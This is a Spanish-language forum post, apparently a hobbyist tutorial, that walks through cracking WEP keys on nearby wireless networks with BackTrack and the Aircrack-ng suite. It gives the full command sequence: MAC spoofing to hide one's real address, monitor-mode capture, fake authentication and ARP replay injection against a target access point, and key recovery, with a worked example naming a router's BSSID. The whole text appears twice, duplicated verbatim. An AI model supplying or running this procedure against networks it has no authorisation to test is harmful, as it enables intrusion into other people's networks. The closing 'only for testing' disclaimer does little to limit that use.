Hola compañeros bakunos, este es mi primer aporte a la comunidad, aunque ya hay otro tema con este mismo nombre ( Backtrack 3 versión USB hackea internet inalambrico ) considero que no se esta compartiendo correctamente.
Este live CD tiene muchas aplicaciones pero yo solo lo he probado para decifrar contraseñas WEB de 64 y 128 bits, utilizando un paquete hecho para Linux llamado Aircrack-ng desde ahorita les digo que es casi imposible desbloquear contraseñas WPA, asi que tenemos que esperar a que se desarrolle el proyecto Tkiptun-ng
bueno en fin, no quiero aburrirlos.
yo he probado este CD con una laptop HP nc6400 con tarjeta wireless Intel Proset a/b/g
les dejo una lista con algunas tarjeta wireless con las que se ha probado BackTrack.
aqui mas documentacion acerca de compatibilidades
BackTrack lo puedes encontrar en diferectes versiones
live CD
live USB
vmWare Version
si necesita mas informacion sobre los creadores esta es la pagina Official de BackTrack.
Para aquellos que ya utilizan Linux pueden instalar directamente este modulo Aircrack-ng y usarlo de cualquier distribucion linux, yo lo he probado con ubuntu y funciona de maravilla, les dejo una imagen mas o menos de como veran cuando decifren una clave WEB.
imagen de ejemplo.
Les dejo un pequeño manual de los comando que yo tuve que poner en mi hp nc6400, en el ejemplo que puse en la imagen es de un router 2Wire que no tenia ningun cliente wireless conectado y me tomo 15 minutos desepcriptarlo entre mas trafico alla en la red wireless mas rapido sera las desepcritada, en la imagen les marque con rojo las partes claves.
modprobe -r iwl3945
modprobe ipwraw
airmon-ng stop <interface> (interface es el nombre de tu tarjeta wireless en mi caso wifi0)
ifconfig <interface> down
macchanger --mac 00:11:22:33:44:55 <interface> (esto te facilitara las cosas para no tener que poner tu macadress real)
airmon-ng start <interface> (activas en modo monitor tu tarjeta)
airodump-ng <interface> (aqui veran una lista de las redes que tienen a su alrededor)
una vez que tengas los datos que necesitas que son Channel, bssid presionas...
Ctrl+C
el bssid es la macaddress del access point.
despues escribes.
airodump-ng -c <channel> -w <filename> --bssid <BSSID> <interface>
en el caso de mi ejemplo channel es el 1
puedes especificar cualquier nombre para el filename por ejemplo "test"
el bssid fue 00:1E:C7:1E:01:B1
Quedo asi airodump-ng -c 1 -w test --00:1E:C7:1E:01:B1 wifi0
despues de esta ultima instruccion veras lo mismo que dice en la primer ventana de la imagen, entonces abre una nueva ventana de Terminal. y escribes lo siguiente
aireplay-ng -1 0 -a <BSSID> -h 00:11:22:33:44:55 -e <ESSID> <interface>
donde ESSID es el nombre de access point en este caso INFINITUM####
si todo sale bien cuando pongas el comando anterior al final de dara una happy face como esta de lo contrario intenta de nuevo, debes estar lo mas cerca posible del access point.
en esa misma ventana escribes lo siguiente, despues de que te salio
aireplay-ng -3 -b <BSSID> -h 00:11:22:33:44:55 <interface>
despues de este comando veras lo mismo que en la ventana derecha que esta en la parte de abajo.
abres una nueva ventana y cuando veas en la primer ventana donde dice #Data que llego a los 15000 como minimo ejecutas este ultimo comando.
aircrack-ng -n 64 -b <BSSID> <filename+"-01.cap">
en el ejemplo quedaria asi aircrack-ng -n 64 00:1E:C7:1E:01:B1 test-01.cap
cuando especificas el filename (test) automaticamente le agrega el -01.cap
si todo te salio bien veras algo parecido a lo que esta en la ventana izquierda de abajo con la clave WEB, solo quitale los : y usa los puros numeros
este programa es para probar la seguridad de las redes wireless, no para andar robando la de los vecinos .
Si este tema les sirvio de ayuda agradescan.
Saludos a todos. :djba-k:
Ahh, Otra cosa antes de preguntar algo primero averiguen en google.com u otro buscador. no sean WEBONES!!! SIN OFENDER ( pero es la verdad )
Este live CD tiene muchas aplicaciones pero yo solo lo he probado para decifrar contraseñas WEB de 64 y 128 bits, utilizando un paquete hecho para Linux llamado Aircrack-ng desde ahorita les digo que es casi imposible desbloquear contraseñas WPA, asi que tenemos que esperar a que se desarrolle el proyecto Tkiptun-ng
bueno en fin, no quiero aburrirlos.
yo he probado este CD con una laptop HP nc6400 con tarjeta wireless Intel Proset a/b/g
les dejo una lista con algunas tarjeta wireless con las que se ha probado BackTrack.
aqui mas documentacion acerca de compatibilidades
BackTrack lo puedes encontrar en diferectes versiones
live CD
live USB
vmWare Version
si necesita mas informacion sobre los creadores esta es la pagina Official de BackTrack.
Para aquellos que ya utilizan Linux pueden instalar directamente este modulo Aircrack-ng y usarlo de cualquier distribucion linux, yo lo he probado con ubuntu y funciona de maravilla, les dejo una imagen mas o menos de como veran cuando decifren una clave WEB.
imagen de ejemplo.
Les dejo un pequeño manual de los comando que yo tuve que poner en mi hp nc6400, en el ejemplo que puse en la imagen es de un router 2Wire que no tenia ningun cliente wireless conectado y me tomo 15 minutos desepcriptarlo entre mas trafico alla en la red wireless mas rapido sera las desepcritada, en la imagen les marque con rojo las partes claves.
modprobe -r iwl3945
modprobe ipwraw
airmon-ng stop <interface> (interface es el nombre de tu tarjeta wireless en mi caso wifi0)
ifconfig <interface> down
macchanger --mac 00:11:22:33:44:55 <interface> (esto te facilitara las cosas para no tener que poner tu macadress real)
airmon-ng start <interface> (activas en modo monitor tu tarjeta)
airodump-ng <interface> (aqui veran una lista de las redes que tienen a su alrededor)
una vez que tengas los datos que necesitas que son Channel, bssid presionas...
Ctrl+C
el bssid es la macaddress del access point.
despues escribes.
airodump-ng -c <channel> -w <filename> --bssid <BSSID> <interface>
en el caso de mi ejemplo channel es el 1
puedes especificar cualquier nombre para el filename por ejemplo "test"
el bssid fue 00:1E:C7:1E:01:B1
Quedo asi airodump-ng -c 1 -w test --00:1E:C7:1E:01:B1 wifi0
despues de esta ultima instruccion veras lo mismo que dice en la primer ventana de la imagen, entonces abre una nueva ventana de Terminal. y escribes lo siguiente
aireplay-ng -1 0 -a <BSSID> -h 00:11:22:33:44:55 -e <ESSID> <interface>
donde ESSID es el nombre de access point en este caso INFINITUM####
si todo sale bien cuando pongas el comando anterior al final de dara una happy face como esta de lo contrario intenta de nuevo, debes estar lo mas cerca posible del access point.
en esa misma ventana escribes lo siguiente, despues de que te salio
aireplay-ng -3 -b <BSSID> -h 00:11:22:33:44:55 <interface>
despues de este comando veras lo mismo que en la ventana derecha que esta en la parte de abajo.
abres una nueva ventana y cuando veas en la primer ventana donde dice #Data que llego a los 15000 como minimo ejecutas este ultimo comando.
aircrack-ng -n 64 -b <BSSID> <filename+"-01.cap">
en el ejemplo quedaria asi aircrack-ng -n 64 00:1E:C7:1E:01:B1 test-01.cap
cuando especificas el filename (test) automaticamente le agrega el -01.cap
si todo te salio bien veras algo parecido a lo que esta en la ventana izquierda de abajo con la clave WEB, solo quitale los : y usa los puros numeros
este programa es para probar la seguridad de las redes wireless, no para andar robando la de los vecinos .
Si este tema les sirvio de ayuda agradescan.
Saludos a todos. :djba-k:
Ahh, Otra cosa antes de preguntar algo primero averiguen en google.com u otro buscador. no sean WEBONES!!! SIN OFENDER ( pero es la verdad )